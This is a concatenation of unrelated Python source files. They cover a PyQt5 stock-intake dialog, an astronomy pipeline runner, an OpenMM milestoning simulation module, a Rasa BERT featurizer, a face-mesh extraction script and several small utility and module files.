import os


def remove_empty_directories_from_dirtree(dirpath):
    """Remove empty directories walking through all nested subdirectories.

    Args:
        dirpath (str): Top directory tree path.
    """
    for root, dirs, files in os.walk(dirpath, topdown=False):
        if not os.listdir(root):
            os.rmdir(root)


def remove_file_and_parent_dir_if_empty(filepath):
    """Remove a file and the directory that contains it if it is empty.

    Args:
        filepath (str): Path of the file to remove.

    Raises:
        FileNotFoundError: the file doesn't exist.
    """
    os.remove(filepath)
    parent_dir = os.path.abspath(os.path.dirname(filepath))
    if not os.listdir(parent_dir):
        os.rmdir(parent_dir)

src/main/python/widgets/dialogs/incoming_dialog.py
from PyQt5 import QtWidgets, QtGui, QtCore

from widgets.line_item_close_button import LineItemCloseButton
from widgets.spec_fields import AutocapField, StockNumberField
from widgets.message_boxes import WarningBox
from utils.styling import (
    generic_title_style,
    generic_groupbox_normal_style,
    generic_messagebox_style,
)
from utils import utils_collection as utils
from utils import db_manager
from utils import tests


class IncomingDialog(QtWidgets.QDialog):
    def __init__(self, parent=None):
        super(IncomingDialog, self).__init__(parent)
        self.incoming_comps_and_amounts_for_operation = {}
        self.data_for_final_dialog = {}
        self.setWindowFlags(
            QtCore.Qt.Dialog
            | QtCore.Qt.CustomizeWindowHint
            | QtCore.Qt.WindowCloseButtonHint
        )
        self.setFixedWidth(410)
        title = QtWidgets.QLabel("Ingreso de componentes")
        title.setAlignment(QtCore.Qt.AlignCenter)
        title.setStyleSheet(generic_title_style)
        top_section = QtWidgets.QHBoxLayout()
        self.packing_list_field = QtWidgets.QLineEdit()
        self.packing_list_field.setPlaceholderText("Remito...")
        self.supplier_field = QtWidgets.QLineEdit()
        self.supplier_field.setPlaceholderText("Proveedor...")
        self.note_field = QtWidgets.QLineEdit()
        self.note_field.setPlaceholderText("Nota...")
        for i in [self.packing_list_field, self.supplier_field, self.note_field]:
            i.setFixedWidth(125)
            top_section.addWidget(i)
        bottom_section = QtWidgets.QHBoxLayout()
        back_button = QtWidgets.QPushButton("« Volver")
        back_button.setShortcut("Alt+v")
        execute_button = QtWidgets.QPushButton("Ejecutar »")
        execute_button.setShortcut("Alt+e")
        execute_button.setDefault(True)
        bottom_section.addWidget(back_button)
        bottom_section.addWidget(execute_button)
        groupbox = QtWidgets.QGroupBox("Componentes ingresantes")
        groupbox.setStyleSheet(generic_groupbox_normal_style)
        groupbox.setMinimumWidth(333)
        add_component_button = QtWidgets.QPushButton("+ Agregar componente")
        add_component_button.setShortcut("Alt+a")
        self.comps_holder_section = QtWidgets.QVBoxLayout()
        groupbox_inner_section = QtWidgets.QVBoxLayout()
        groupbox_inner_section_1 = QtWidgets.QHBoxLayout()
        groupbox_inner_section_1.addWidget(add_component_button)
        groupbox_inner_section_2 = QtWidgets.QHBoxLayout()
        groupbox_inner_section_2.addLayout(self.comps_holder_section)
        groupbox_inner_section.addLayout(groupbox_inner_section_1)
        groupbox_inner_section.addLayout(groupbox_inner_section_2)
        groupbox.setLayout(groupbox_inner_section)
        groupbox_section = QtWidgets.QHBoxLayout()
        groupbox_section.addStretch()
        groupbox_section.addWidget(groupbox)
        groupbox_section.addStretch()
        layout = QtWidgets.QVBoxLayout()
        layout.setSizeConstraint(QtWidgets.QLayout.SetFixedSize)
        layout.addWidget(title)
        layout.addLayout(top_section)
        layout.addLayout(groupbox_section)
        layout.addLayout(bottom_section)
        self.setLayout(layout)
        back_button.clicked.connect(self.close)
        add_component_button.clicked.connect(self.add_line)
        execute_button.clicked.connect(self.execute_incoming_comps)

    def add_line(self):
        single_line_section = QtWidgets.QHBoxLayout()
        component_field = AutocapField("Componente...")
        component_field.setFixedWidth(200)
        component_field.setFocus()
        component_field.set_completer(source="comps in stock")
        value_field = StockNumberField("Cantidad...")
        value_field.setFixedWidth(80)
        close_button = LineItemCloseButton(holder=self.comps_holder_section)
        single_line_section.addWidget(component_field)
        single_line_section.addWidget(value_field)
        single_line_section.addWidget(close_button)
        self.comps_holder_section.addLayout(single_line_section)

    def execute_incoming_comps(self):
        for i in [
            self.test_if_packing_list_or_supplier_fields_are_empty,
            self.test_if_there_are_no_components,
            self.test_if_there_are_duplicates,
            self.test_if_there_are_empty_main_fields,
            self.test_if_there_are_unrecognized_components,
        ]:
            if i():
                return
        self.insert_incoming_comps_into_db()

    def test_if_packing_list_or_supplier_fields_are_empty(self):
        if self.packing_list_field.text() == "":
            WarningBox("Remito faltante", "Ingresar remito\nantes de ejecutar.").exec_()
            self.packing_list_field.setFocus()
            return True
        elif self.supplier_field.text() == "":
            WarningBox(
                "Proveedor faltante", "Ingresar proveedor\nantes de ejecutar."
            ).exec_()
            self.supplier_field.setFocus()
            return True
        else:
            return False

    def test_if_there_are_no_components(self):
        no_line_items = not self.comps_holder_section.children()
        contents = utils.get_line_items_contents(self.comps_holder_section)
        empty_string = tests.test_if_empty_string_in_line_items_contents(contents)
        if no_line_items or empty_string:
            WarningBox(
                "Sin componentes",
                "Completar o borrar campos\nvacíos antes de ejecutar.",
            ).exec_()
            return True
        else:
            return False

    def test_if_there_are_duplicates(self):
        contents = utils.get_line_items_contents(self.comps_holder_section)
        duplicates = tests.test_if_duplicated_first_value_in_line_items_contents(
            contents
        )
        if duplicates:
            WarningBox(
                "Componentes duplicados", "Borrar uno de los componentes duplicados."
            ).exec_()
            return True
        else:
            return False

    def test_if_there_are_empty_main_fields(self):
        contents = utils.get_line_items_contents(self.comps_holder_section)
        if not all(contents):
            return self.autoremove_line()
        else:
            return False

    def test_if_there_are_unrecognized_components(self):
        contents = utils.get_line_items_contents(self.comps_holder_section)
        incoming_comps = contents[0::2]
        db = db_manager.DB_Manager()
        existing_comps = db.get_all_display_names_for_components()
        db.close_connection()
        unrecognized_comps = not set(incoming_comps).issubset(existing_comps)
        if unrecognized_comps:
            WarningBox(
                "Componente extraño",
                "Componente no reconocido. Cargar el\ncomponente desde el autocompletado.",
            ).exec_()
            return True
        else:
            return False

    def autoremove_line(self):
        for line_layout in self.comps_holder_section.layout().children():
            two_empty_fields_on_same_line = (
                line_layout.itemAt(0).widget().text() == ""
                and line_layout.itemAt(1).widget().text() == ""
            )
            if two_empty_fields_on_same_line:
                if len(self.comps_holder_section.layout().children()) > 1:
                    utils.remove_three_widget_layout(line_layout)
                    return False
                else:
                    if len(self.comps_holder_section.layout().children()) <= 1:
                        WarningBox(
                            "Sin componentes",
                            "Completar o borrar campos\nvacíos antes de ejecutar.",
                        ).exec_()
                        return True
            elif not two_empty_fields_on_same_line:
                WarningBox(
                    "Sin componentes",
                    "Completar o borrar campos\nvacíos antes de ejecutar.",
                ).exec_()
                return True

    def insert_incoming_comps_into_db(self):
        fields_contents = utils.get_line_items_contents(self.comps_holder_section)
        incoming_components = fields_contents[0::2]
        incoming_amounts = fields_contents[1::2]
        incoming_components_and_amounts_for_display = dict(
            zip(incoming_components, incoming_amounts)
        )
        db = db_manager.DB_Manager()
        for k, v in incoming_components_and_amounts_for_display.items():
            self.incoming_comps_and_amounts_for_operation[
                db.get_SQL_name_for_component(k)
            ] = utils.format_number_for_calculation(v)
        for component_display in incoming_components_and_amounts_for_display.keys():
            for (
                comp_sql,
                amount,
            ) in self.incoming_comps_and_amounts_for_operation.items():
                stock_vald_pre_application = db.get_stock_at_valdenegro_for(comp_sql)
                stock_vald_post_application = stock_vald_pre_application + amount
                self.data_for_final_dialog[component_display] = [
                    stock_vald_pre_application,
                    stock_vald_post_application,
                ]
                data = {
                    "comp_sql": comp_sql,
                    "amount": amount,
                    "packing_list": self.packing_list_field.text(),
                    "supplier": self.supplier_field.text(),
                    "note": self.note_field.text() if self.note_field.text() else "---",
                    "stock_vald_post_application": stock_vald_post_application,
                    "stock_karina": db.get_stock_at_assembler_for(comp_sql, "karina"),
                    "stock_brid": db.get_stock_at_assembler_for(comp_sql, "brid"),
                    "stock_tercero": db.get_stock_at_assembler_for(comp_sql, "tercero"),
                }
                db.apply_incoming_to_valdenegro(data)
        start_screen = self.parent().parent().parent().start_screen
        start_screen.rebuild_main_section()
        settings = QtCore.QSettings("solutronic", "admin_stock")
        for component, amount in incoming_components_and_amounts_for_display.items():
            db.log_new_movement(
                movement="Ingreso",
                destination="Depósito",
                component=component,
                amount=amount,
                user=settings.value("username"),
            )
        db.close_connection()
        IncomingAppliedMessageBox(self).exec_()


class IncomingAppliedMessageBox(QtWidgets.QMessageBox):
    def __init__(self, parent=None):
        super(IncomingAppliedMessageBox, self).__init__(parent)
        comps_and_amounts = (
            self.sender().parent().incoming_comps_and_amounts_for_operation
        )
        data_for_final_dialog = self.sender().parent().data_for_final_dialog
        self.setWindowTitle("Finalizado")
        self.setWindowFlags(
            QtCore.Qt.Dialog
            | QtCore.Qt.CustomizeWindowHint
            | QtCore.Qt.WindowTitleHint
            | QtCore.Qt.WindowCloseButtonHint
        )
        title = QtWidgets.QLabel("Ingreso aplicado a Depósito")
        title.setAlignment(QtCore.Qt.AlignCenter)
        title.setStyleSheet(generic_title_style)
        table = QtWidgets.QTableWidget()
        table.setFixedWidth(400)
        table.setFocusPolicy(QtCore.Qt.NoFocus)
        table.setSelectionMode(QtWidgets.QAbstractItemView.NoSelection)
        table.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
        table.verticalHeader().setVisible(False)
        table.setSelectionMode(QtWidgets.QAbstractItemView.NoSelection)
        table.setColumnCount(4)
        table.setHorizontalHeaderLabels(["Componente", "Inicial", "Ingreso", "Final"])
        table.horizontalHeaderItem(0).setTextAlignment(QtCore.Qt.AlignHCenter)
        table.horizontalHeaderItem(1).setTextAlignment(QtCore.Qt.AlignHCenter)
        table.horizontalHeaderItem(2).setTextAlignment(QtCore.Qt.AlignHCenter)
        table.horizontalHeaderItem(3).setTextAlignment(QtCore.Qt.AlignHCenter)
        table.horizontalHeader().setDefaultSectionSize(70)
        table.horizontalHeader().setSectionResizeMode(0, QtWidgets.QHeaderView.Stretch)
        table.horizontalHeader().setSectionResizeMode(1, QtWidgets.QHeaderView.Fixed)
        table.horizontalHeader().setSectionResizeMode(2, QtWidgets.QHeaderView.Fixed)
        table.horizontalHeader().setSectionResizeMode(3, QtWidgets.QHeaderView.Fixed)
        table.setRowCount(len(comps_and_amounts))
        incoming_comp_names = data_for_final_dialog.keys()
        incoming_comp_amounts = comps_and_amounts.values()
        stock_vald_pre_application = [v[0] for v in data_for_final_dialog.values()]
        stock_vald_post_application = [v[1] for v in data_for_final_dialog.values()]
        utils.populate_table_column_with_list_of_strings(
            table=table, col_num=0, input_list=incoming_comp_names
        )
        utils.populate_table_column_with_list_of_integers(
            table=table, col_num=1, input_list=stock_vald_pre_application
        )
        utils.populate_table_column_with_list_of_integers(
            table=table, col_num=2, input_list=incoming_comp_amounts, with_plus=True
        )
        for i in range(table.rowCount()):
            table.item(i, 2).setBackground(QtGui.QColor("#79c879"))
        utils.populate_table_column_with_list_of_integers(
            table=table, col_num=3, input_list=stock_vald_post_application
        )
        custom_height = table.rowCount() * 30 + 25
        table.setMaximumHeight(custom_height)
        table.setFixedHeight(custom_height)
        ok_button = QtWidgets.QPushButton("OK")
        layout = QtWidgets.QVBoxLayout()
        layout.addWidget(title)
        layout.addWidget(table)
        layout.addWidget(ok_button)
        self.layout().addLayout(layout, 0, 0, 0, 0, QtCore.Qt.AlignTop)
        self.setStyleSheet(generic_messagebox_style)
        admin_window = self.parent().parent().parent().parent()
        admin_window.statusbar.show_quick_message("Ingreso aplicado a Depósito")
        ok_button.clicked.connect(self.close)
        ok_button.clicked.connect(self.parent().close)

1-10
__version__ = (0, 0, 3)
version = '.'.join(map(str, __version__))

from .core import benchmark

0
from autofit import conf
from autolens.data import ccd
from autolens.data.plotters import ccd_plotters
import os

# Welcome to the pipeline runner. This tool allows you to load strong lens data, and pass it to pipelines for a
# PyAutoLens analysis. To show you around, we'll load up some example data and run it through some of the example
# pipelines that come distributed with PyAutoLens.

# The runner is supplied as both this Python script and a Jupyter notebook. It's up to you which you use - I personally
# prefer the python script as provided you keep it relatively small, it's quick and easy to comment out different lens
# names and pipelines to perform different analyses. However, notebooks are a tidier way to manage visualization - so
# feel free to use notebooks. Or, use both for a bit, and decide your favourite!

# The pipeline runner is fairly self-explanatory. Make sure to check out the pipelines in the
# workspace/pipelines/examples/ folder - they come with detailed descriptions of what they do. I hope that you'll
# expand on them for your own personal scientific needs.

# Get the relative path to the config files and output folder in our workspace.
path = '{}/../'.format(os.path.dirname(os.path.realpath(__file__)))

# Use this path to explicitly set the config path and output path.
conf.instance = conf.Config(config_path=path + 'config', output_path=path + 'output')

# It is convenient to specify the lens name as a string, so that if the pipeline is applied to multiple images we
# don't have to change all of the path entries in the load_ccd_data_from_fits function below.

lens_name = 'lens_light_and_x1_source'  # An example simulated image with lens light emission and a source galaxy.
pixel_scale = 0.1

# lens_name = 'slacs1430+4105'  # Example HST imaging of the SLACS strong lens slacs1430+4150.
# pixel_scale = 0.03

ccd_data = ccd.load_ccd_data_from_fits(image_path=path + '/data/example/' + lens_name + '/image.fits',
                                       psf_path=path + '/data/example/' + lens_name + '/psf.fits',
                                       noise_map_path=path + '/data/example/' + lens_name + '/noise_map.fits',
                                       pixel_scale=pixel_scale)

ccd_plotters.plot_ccd_subplot(ccd_data=ccd_data)

# Running a pipeline is easy, we simply import it from the pipelines folder and pass the lens data to its run function.
# Below, we'll use a 3 phase example pipeline to fit the data with a parametric lens light, mass and source light
# profile. Check out _workspace/pipelines/examples/lens_light_and_x1_source_parametric.py_ for a full description of
# the pipeline.

# from pipelines.examples import lens_light_and_x1_source_parametric
#
# pipeline = lens_light_and_x1_source_parametric.make_pipeline(pipeline_path='example/' + lens_name + '/')
#
# pipeline.run(data=ccd_data)

# Another pipeline in the examples folder uses 5 phases to ultimately reconstruct the source galaxy on an adaptive
# pixel-grid. To run this pipeline on our data, simply comment out / delete the lines above (lines 47-51) which run
# the parametric source pipeline, and uncomment the lines below.

from workspace.pipelines.examples import lens_light_and_source_inversion

pipeline = lens_light_and_source_inversion.make_pipeline(pipeline_path='example/' + lens_name + '/')

pipeline.run(data=ccd_data)

# And there we have it, the pipeline runner. For me personally, I find it easiest to manage my lens models by having
# multiple pipeline runners as Python scripts, with each dedicated to a specific set of pipelines and lenses. This makes it
# easier to set off multiple pipelines at the same time, whilst keeping a good sense of what their purpose is.

# You can experiment with different runners to figure out the workflow that works best for you - you may well prefer using
# a Jupyter notebook to run pipelines, so make sure to check out the notebook pipeline runner also in this folder.

unknowncoder05/HRM
hrm_api/applied/views/__init__.py
0
from .project import *

# AUTOGENERATED BY NBDEV! DO NOT EDIT!
__all__ = ["index", "modules", "custom_doc_links", "git_url"]

index = {"get_rand_imgs": "00_prep.ipynb", "vid_from_frames": "00_prep.ipynb", "Video": "00_prep.ipynb", "VideoDataset": "00_prep.ipynb", "get_rico_imgs": "00_prep.ipynb", "read_video_data": "00_prep.ipynb", "get_non_duplicate_corpus": "00_prep.ipynb", "generate_setting2": "00_prep.ipynb", "get_all_texts": "00_prep.ipynb", "Extractor": "01_features.ipynb", "SIFTExtractor": "01_features.ipynb", "CNNExtractor": "01_features.ipynb", "imagenet_normalize_transform": "03_model.ipynb", "get_transforms": "01_features.ipynb", "SimCLRExtractor": "01_features.ipynb", "gen_vcodebook": "01_features.ipynb", "gen_codebooks": "01_features.ipynb", "get_df": "01_features.ipynb", "get_bovw": "01_features.ipynb", "extract_features": "01_features.ipynb", "new_get_bovw": "01_features.ipynb", "calc_tf_idf": "02_eval.ipynb", "cosine_similarity": "02_eval.ipynb", "hit_rate_at_k": "02_eval.ipynb", "mean_reciprocal_rank": "02_eval.ipynb", "r_precision": "02_eval.ipynb", "precision_at_k": "02_eval.ipynb", "average_precision": "02_eval.ipynb", "mean_average_precision": "02_eval.ipynb", "recall_at_k": "02_eval.ipynb", "rank_stats": "02_eval.ipynb", "evaluate": "02_eval.ipynb", "get_eval_results": "02_eval.ipynb", "evaluate_ranking": "02_eval.ipynb", "sift_frame_sim": "03_model.ipynb", "simclr_frame_sim": "03_model.ipynb", "SimCLRDataset": "03_model.ipynb", "get_train_transforms": "03_model.ipynb", "get_val_transforms": "03_model.ipynb", "NTXEntCriterion": "03_model.ipynb", "SimCLRModel": "03_model.ipynb", "flatten_dict": "04_approach.ipynb", "gen_extracted_features": "04_approach.ipynb", "gen_tfidfs": "04_approach.ipynb", "gen_bovw_similarity": "04_approach.ipynb", "fuzzy_LCS": "04_approach.ipynb", "gen_lcs_similarity": "04_approach.ipynb", "fix_sims": "04_approach.ipynb", "sort_rankings": "04_approach.ipynb", "approach": "04_approach.ipynb", "compute_sims": "04_approach.ipynb", "logger": "05_cli.ipynb", "URLs": "05_cli.ipynb", "download": "05_cli.ipynb", "VWORDS": "05_cli.ipynb", "N_IMGS": "05_cli.ipynb", "N_FRAMES_TO_KEEP": "05_cli.ipynb", "FPS": "05_cli.ipynb", "BEST_DL_MODELS": "05_cli.ipynb", "BEST_IR_MODELS": "05_cli.ipynb", "BEST_MODEL_CONFIGS": "05_cli.ipynb", "reproduce": "05_cli.ipynb", "tango": "05_cli.ipynb", "write_json_line_by_line": "07_utils.ipynb", "read_csv_to_dic_list": "07_utils.ipynb", "read_json": "07_utils.ipynb", "read_json_line_by_line": "07_utils.ipynb", "find_file": "07_utils.ipynb", "write_csv_from_json_list": "07_utils.ipynb", "group_dict": "07_utils.ipynb", "load_settings": "07_utils.ipynb", "get_grayscale": "07_utils.ipynb", "remove_noise": "07_utils.ipynb", "thresholding": "07_utils.ipynb", "thresholding_med": "07_utils.ipynb", "dilate": "07_utils.ipynb", "erode": "07_utils.ipynb", "opening": "07_utils.ipynb", "canny": "07_utils.ipynb", "deskew": "07_utils.ipynb", "match_template": "07_utils.ipynb", "extract_text": "07_utils.ipynb", "preprocess_img": "07_utils.ipynb", "extract_frames": "07_utils.ipynb", "process_frame": "07_utils.ipynb", "execute_retrieval_run": "08_combo.ipynb", "run_settings": "08_combo.ipynb", "write_results": "08_combo.ipynb", "write_rankings": "08_combo.ipynb", "convert_results_format": "08_combo.ipynb", "get_info_to_ranking_results": "08_combo.ipynb", "tango_combined": "08_combo.ipynb"}

modules = ["prep.py", "features.py", "eval.py", "model.py", "approach.py", "cli.py", "utils.py", "combo.py"]

doc_url = "https://ncoop57.github.io/tango/"

git_url = "https://github.com/ncoop57/tango/tree/main/"

def custom_doc_links(name):
    return None
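# A small usage sketch (not part of the generated file; the keys below are taken from
# the mapping above): `index` maps each exported symbol to the notebook that defines it,
# and `modules` lists the generated .py modules.
assert index["get_bovw"] == "01_features.ipynb"
assert "features.py" in modules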
"""
mmvt_sim_openmm.py

Create the Sim_openmm object which contains the objects needed for an
openmm simulation based on the settings provided by a user. These
objects are specific to MMVT only.
"""

try:
    import openmm.app as openmm_app
except ImportError:
    import simtk.openmm.app as openmm_app

from parmed import unit

import seekr2plugin
import seekr2.modules.common_sim_openmm as common_sim_openmm


class MMVT_sim_openmm(common_sim_openmm.Common_sim_openmm):
    """
    system : The OpenMM system object for this simulation.

    integrator : the OpenMM integrator object for this simulation.

    simulation : the OpenMM simulation object.

    traj_reporter : openmm.DCDReporter
        The OpenMM Reporter object to which the trajectory will be written.

    energy_reporter : openmm.StateDataReporter
        The OpenMM StateDataReporter to which the energies and other state
        data will be reported.
    """
    def __init__(self):
        super(MMVT_sim_openmm, self).__init__()
        self.system = None
        self.integrator = None
        self.simulation = None
        self.traj_reporter = openmm_app.DCDReporter
        self.energy_reporter = openmm_app.StateDataReporter
        return


def add_integrator(sim_openmm, model, state_prefix=None):
    """
    Assign the proper integrator to this OpenMM simulation.
    """
    if model.openmm_settings.langevin_integrator is not None:
        target_temperature = \
            model.openmm_settings.langevin_integrator.target_temperature
        friction_coefficient = \
            model.openmm_settings.langevin_integrator.friction_coefficient
        random_seed = \
            model.openmm_settings.langevin_integrator.random_seed
        timestep = \
            model.openmm_settings.langevin_integrator.timestep
        rigid_constraint_tolerance = \
            model.openmm_settings.langevin_integrator.rigid_tolerance
        sim_openmm.timestep = timestep
        sim_openmm.integrator = seekr2plugin.MmvtLangevinIntegrator(
            target_temperature*unit.kelvin,
            friction_coefficient/unit.picoseconds,
            timestep*unit.picoseconds,
            sim_openmm.output_filename)
        if random_seed is not None:
            sim_openmm.integrator.setRandomNumberSeed(random_seed)
        if rigid_constraint_tolerance is not None:
            sim_openmm.integrator.setConstraintTolerance(
                rigid_constraint_tolerance)
        if state_prefix is not None:
            sim_openmm.integrator.setSaveStateFileName(state_prefix)
    else:
        raise Exception("Settings not provided for available "
                        "integrator type(s).")
    return


def add_forces(sim_openmm, model, anchor):
    """
    Add the proper forces for this MMVT simulation.
    """
    for milestone in anchor.milestones:
        cv = milestone.get_CV(model)
        myforce = make_mmvt_boundary_definitions(cv, milestone)
        sim_openmm.integrator.addMilestoneGroup(milestone.alias_index)
        forcenum = sim_openmm.system.addForce(myforce)
    return


def add_simulation(sim_openmm, model, topology, positions, box_vectors,
                   frame=0):
    """
    Assign the OpenMM simulation object for MMVT.
    """
    sim_openmm.simulation = openmm_app.Simulation(
        topology.topology, sim_openmm.system,
        sim_openmm.integrator, sim_openmm.platform,
        sim_openmm.properties)
    if positions is not None:
        assert frame >= 0, "Cannot have negative frame index"
        assert frame < positions.getNumFrames(), \
            "Frame index {} out of range.".format(frame)
        sim_openmm.simulation.context.setPositions(
            positions.getPositions(frame=frame))
        sim_openmm.simulation.context.setVelocitiesToTemperature(
            model.openmm_settings.initial_temperature * unit.kelvin)
    if box_vectors is not None:
        sim_openmm.simulation.context.setPeriodicBoxVectors(
            *box_vectors.to_quantity())
    if model.openmm_settings.run_minimization:
        assert positions is not None, "If states are being loaded as starting"\
            "positions, minimizations cannot be activated."
        print("Warning: running minimizations. It is recommended that "
              "structures are minimized and verified by the user before "
              "running SEEKR, since minimizations might cause the system "
              "to drift out of the MMVT cell.")
        sim_openmm.simulation.minimizeEnergy()
    assert sim_openmm.timestep is not None
    return


def create_sim_openmm(model, anchor, output_filename, state_prefix=None,
                      frame=0):
    """
    Take all relevant model and anchor information and generate
    the necessary OpenMM objects to run the simulation.

    Parameters
    ----------
    model : Model()
        The Model which contains the anchor and all settings for
        the simulation that is about to be run.

    anchor : Anchor()
        The anchor object that this OpenMM simulation applies to.

    output_filename : str
        The name of the file that will be written by the plugin as
        the MMVT simulation proceeds, recording every 'bounce'.

    state_prefix : str or None
        The plugin can optionally save every state during a bounce.
        These can be used to seed simulations in other cells. This
        argument provides the file prefix for these saved states.
        If None, then no states will be written.

    frame : int
        Which frame of the starting positions file to retrieve.

    Returns
    -------
    sim_openmm : Sim_openmm()
        The sim_openmm object, which contains everything needed
        to run an MMVT simulation within OpenMM.
    """
    sim_openmm = MMVT_sim_openmm()
    common_sim_openmm.fill_generic_parameters(
        sim_openmm, model, anchor, output_filename)
    system, topology, positions, box_vectors \
        = common_sim_openmm.create_openmm_system(sim_openmm, model, anchor)
    sim_openmm.system = system
    add_integrator(sim_openmm, model, state_prefix=state_prefix)
    common_sim_openmm.add_barostat(sim_openmm, model)
    common_sim_openmm.add_platform(sim_openmm, model)
    add_forces(sim_openmm, model, anchor)
    add_simulation(sim_openmm, model, topology, positions, box_vectors, frame)
    return sim_openmm


def make_mmvt_boundary_definitions(cv, milestone):
    """
    Take a Collective_variable object and a particular milestone and
    return an OpenMM Force() object that the plugin can use to monitor
    crossings.

    Parameters
    ----------
    cv : Collective_variable()
        A Collective_variable object which contains all the information
        for the collective variable describing this variable. In fact,
        the boundaries are contours of the function described by cv.
        This variable contains information like the groups of atoms
        involved with the CV, and the expression which describes the
        function.

    milestone : Milestone()
        A Milestone object which describes the boundary between two
        Voronoi cells. This variable contains information like the
        values of the variables which will be entered into the
        Force() object.
    Returns
    -------
    myforce : openmm.Force()
        An OpenMM force object which does not affect atomic motion, but
        allows us to conveniently monitor a function of atomic position.
    """
    myforce = cv.make_force_object()
    myforce.setForceGroup(1)
    variable_names_list = cv.add_parameters(myforce)
    cv.add_groups_and_variables(myforce, cv.get_variable_values_list(
        milestone))
    return myforce


def get_starting_structure_num_frames(model, anchor, dummy_outfile):
    """
    For an anchor's starting structure, find and return the number of frames.
    """
    sim_openmm = MMVT_sim_openmm()
    common_sim_openmm.fill_generic_parameters(
        sim_openmm, model, anchor, dummy_outfile)
    dummy_system, dummy_topology, positions, dummy_box_vectors \
        = common_sim_openmm.create_openmm_system(sim_openmm, model, anchor)
    num_frames = 0
    if positions is not None:
        num_frames = positions.getNumFrames()
    return num_frames

1-10
from discord.ext import commands


class DataBase:
    def __init__(self, psql=None, redis=None):
        self.psql = psql
        self.redis = redis


class Context(commands.Context):
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.db = DataBase(self.bot.pool, self.bot.redis)
        self.color = self.bot.color
        self.running = None
        self.debug = kwargs.get("debug", False)
        self.beta = kwargs.get("beta", False)

    async def send(self, content: str = None, **kwargs):
        if not self.interaction:
            if "mention_author" not in kwargs:
                kwargs["mention_author"] = False
            kwargs["reference"] = self.message
        return await super().send(content, **kwargs)

# -*- coding: UTF-8 -*-
import logging
import os
import re
from typing import Any, Dict, List, Optional, Text

from rasa_nlu import utils
from rasa_nlu.featurizers import Featurizer
from rasa_nlu.training_data import Message
from rasa_nlu.components import Component
from rasa_nlu.model import Metadata
from rasa_nlu.training_data.training_data import TrainingData
from rasa_nlu.config import RasaNLUModelConfig
from rasa_nlu.tokenizers import jieba_tokenizer
import jieba

from bert_serving.client import ConcurrentBertClient
import numpy as np
from tqdm import tqdm

logger = logging.getLogger(__name__)


class BertFeaturizer(Featurizer):
    provides = []
    requires = []
    defaults = {
        "ip": 'localhost',
        "port": '8125',
        "port_out": '5556',
        "show_server_config": False,
        "output_fmt": 'ndarray',
        "check_version": False,
        "timeout": -1,  # read in __init__ below; -1 is assumed to mean "wait indefinitely", matching the bert-serving client default
        "identity": None,
        "batch_size": 128
    }
    language_list = None

    def __init__(self, component_config):
        super(BertFeaturizer, self).__init__(component_config)
        ip = self.component_config['ip']
        port = self.component_config['port']
        port_out = self.component_config['port_out']
        show_server_config = self.component_config['show_server_config']
        output_fmt = self.component_config['output_fmt']
        check_version = self.component_config['check_version']
        timeout = self.component_config['timeout']
        identity = self.component_config['identity']
        self.concurrent_bertClient = ConcurrentBertClient(
            ip=ip,
            port=int(port),
            port_out=int(port_out),
            show_server_config=show_server_config,
            output_fmt=output_fmt,
            check_version=check_version,
            timeout=timeout,
            identity=identity,
            check_length=False
        )

    @classmethod
    def required_packages(cls) -> List[Text]:
        return ["numpy", "bert_serving"]

    @classmethod
    def load(cls,
             meta: Dict[Text, Any],
             model_dir: Optional[Text] = None,
             model_metadata: Optional["Metadata"] = None,
             cached_component: Optional["Component"] = None,
             **kwargs: Any
             ) -> "Component":
        return cls(meta)

    def _get_message_text(self, messages):
        # all_tokens = [message.data['tokens'] for message in messages]
        all_tokens = [list(jieba.cut(message.text)) for message in messages]
        bert_embedding = self.concurrent_bertClient.encode(all_tokens, is_tokenized=True)
        return np.squeeze(bert_embedding)

    def train(self, training_data: TrainingData, cfg: RasaNLUModelConfig = None, **kwargs: Any) -> None:
        batch_size = self.component_config['batch_size']
        epochs = len(training_data.intent_examples) // batch_size + \
            int(len(training_data.intent_examples) % batch_size > 0)
        for ep in tqdm(range(epochs), desc="Epochs"):
            end_index = (ep + 1) * batch_size
            start_index = ep * batch_size
            examples = training_data.intent_examples[start_index:end_index]
            tokens = self._get_message_text(examples)
            X = np.array(tokens)
            for index, example in enumerate(examples):
                example.set("text_features", self._combine_with_existing_text_features(example, X[index]))

    def process(self, message: Message, **kwargs) -> None:
        features = self._get_message_text([message])
        message.set("text_features", self._combine_with_existing_text_features(message, features))

1-10
import cv2
import mediapipe
import numpy as np
import csv
import sys
import getopt


def pic_to_mesh(imagepath):
    faceModule = mediapipe.solutions.face_mesh
    with faceModule.FaceMesh(static_image_mode=True) as face:
        image = cv2.imread(imagepath)
        results = face.process(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
        point_values = []
        for facial_landmarks in results.multi_face_landmarks:
            point_values = []
            for i in range(0, 468):
                pt1 = facial_landmarks.landmark[i]
                point_values.append(pt1.x)
                point_values.append(pt1.y)
                point_values.append(pt1.z)
    return point_values


def persist_row_to_csv(point_values, output_file):
    # persist to CSV
    with open(output_file, 'a') as f:
        # using csv.writer method from CSV package
        write = csv.writer(f, lineterminator='\r\n')
        write.writerow(point_values)


def main(argv):
    inputfile = ''
    outputfile = 'image_mesh.csv'
    try:
        opts, args = getopt.getopt(argv, "hi:o:", ["ifile=", "ofile="])
    except getopt.GetoptError:
        print('test.py -i -o ')
        sys.exit(2)
    for opt, arg in opts:
        if opt == '-h':
            print('pic_to_facemesh.py -i -o ')
            sys.exit()
        elif opt in ("-i", "--inputimage"):
            inputfile = arg
        elif opt in ("-o", "--outputcsv"):
            outputfile = arg
    if inputfile == '':
        raise ValueError('Input Image must be provided.')
    persist_row_to_csv(pic_to_mesh(inputfile), outputfile)
    print("Image Facemesh of {} has been persisted to file: {}!".format(inputfile, outputfile))


if __name__ == "__main__":
    main(sys.argv[1:])
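# A hedged usage sketch for the command-line entry point above; "face.jpg" and
# "landmarks.csv" are hypothetical file names, not part of the original script:
#
#     python pic_to_facemesh.py -i face.jpg -o landmarks.csv
#
# Each run appends one row of 468 * 3 = 1404 landmark coordinates (x, y, z) to the CSV.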
# Copyright (c) 2017,2019 MetPy Developers.
# Distributed under the terms of the BSD 3-Clause License.
# SPDX-License-Identifier: BSD-3-Clause
"""Test the `indices` module."""

from datetime import datetime

import numpy as np

from metpy.calc import (bulk_shear, bunkers_storm_motion, critical_angle,
                        mean_pressure_weighted, precipitable_water,
                        significant_tornado, supercell_composite)
from metpy.testing import (assert_almost_equal, assert_array_equal,
                           check_and_silence_warning, get_upper_air_data)
